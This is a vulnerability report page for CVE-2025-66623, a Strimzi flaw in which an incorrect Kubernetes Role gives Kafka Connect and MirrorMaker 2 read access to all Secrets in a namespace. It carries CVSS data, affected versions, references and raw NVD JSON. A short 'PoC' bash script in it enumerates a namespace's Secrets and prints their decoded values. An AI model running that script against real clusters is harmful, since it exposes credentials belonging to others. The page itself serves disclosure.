Security Vulnerability Report
CVE-2025-66623 CVSS 7.4 HIGH

CVE-2025-66623

Published: 2025-12-05 19:15:53
Last Modified: 2026-03-04 20:32:24

Description

Strimzi provides a way to run an Apache Kafka cluster on Kubernetes or OpenShift in various deployment configurations. From 0.47.0 and prior to 0.49.1, in some situations, Strimzi creates an incorrect Kubernetes Role which grants the Apache Kafka Connect and Apache Kafka MirrorMaker 2 operands the GET access to all Kubernetes Secrets that exist in the given Kubernetes namespace. The issue is fixed in Strimzi 0.49.1.

CVSS Details

CVSS Score: 7.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:strimzi:*:*:*:*:*:*:*:* - VULNERABLE
Strimzi 0.47.0
Strimzi 0.47.1
Strimzi 0.48.0
Strimzi 0.48.1
Strimzi 0.49.0
Strimzi < 0.49.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-66623 PoC - Strimzi Kafka Connect Secret Access
# Prerequisites: kubectl configured with access to the target namespace
TARGET_NAMESPACE="strimzi"
SECRET_LIST=$(kubectl get secrets -n "$TARGET_NAMESPACE" -o jsonpath='{.items[*].metadata.name}')

echo "[*] Enumerating Secrets in namespace: $TARGET_NAMESPACE"
for SECRET in $SECRET_LIST; do
  echo "[+] Attempting to read secret: $SECRET"
  kubectl get secret "$SECRET" -n "$TARGET_NAMESPACE" -o json \
    | jq -r '.data | to_entries[] | " Key: \(.key), Value: \(.value | @base64d)"'
done

echo "[*] Checking for Kafka Connect service account"
kubectl get serviceaccount -n "$TARGET_NAMESPACE" | grep -i connect

echo "[*] Checking RoleBindings for Kafka Connect"
kubectl get rolebindings -n "$TARGET_NAMESPACE" -o wide | grep -i connect

References

https://github.com/strimzi/strimzi-kafka-operator/commit/c8a14935e99c91eb0dd865431f46515da9f82ccc (Patch)
https://github.com/strimzi/strimzi-kafka-operator/security/advisories/GHSA-xrhh-hx36-485q (Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-66623",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-05T19:15:52.910",
    "lastModified": "2026-03-04T20:32:24.260",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Strimzi provides a way to run an Apache Kafka cluster on Kubernetes or OpenShift in various deployment configurations. From 0.47.0 and prior to 0.49.1, in some situations, Strimzi creates an incorrect Kubernetes Role which grants the Apache Kafka Connect and Apache Kafka MirrorMaker 2 operands the GET access to all Kubernetes Secrets that exist in the given Kubernetes namespace. The issue is fixed in Strimzi 0.49.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-200"},
          {"lang": "en", "value": "CWE-863"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:linuxfoundation:strimzi:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "0.49.1",
                "matchCriteriaId": "55FC7CB9-D19F-4293-ACE7-38285D1112D5"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/strimzi/strimzi-kafka-operator/commit/c8a14935e99c91eb0dd865431f46515da9f82ccc",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/strimzi/strimzi-kafka-operator/security/advisories/GHSA-xrhh-hx36-485q",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}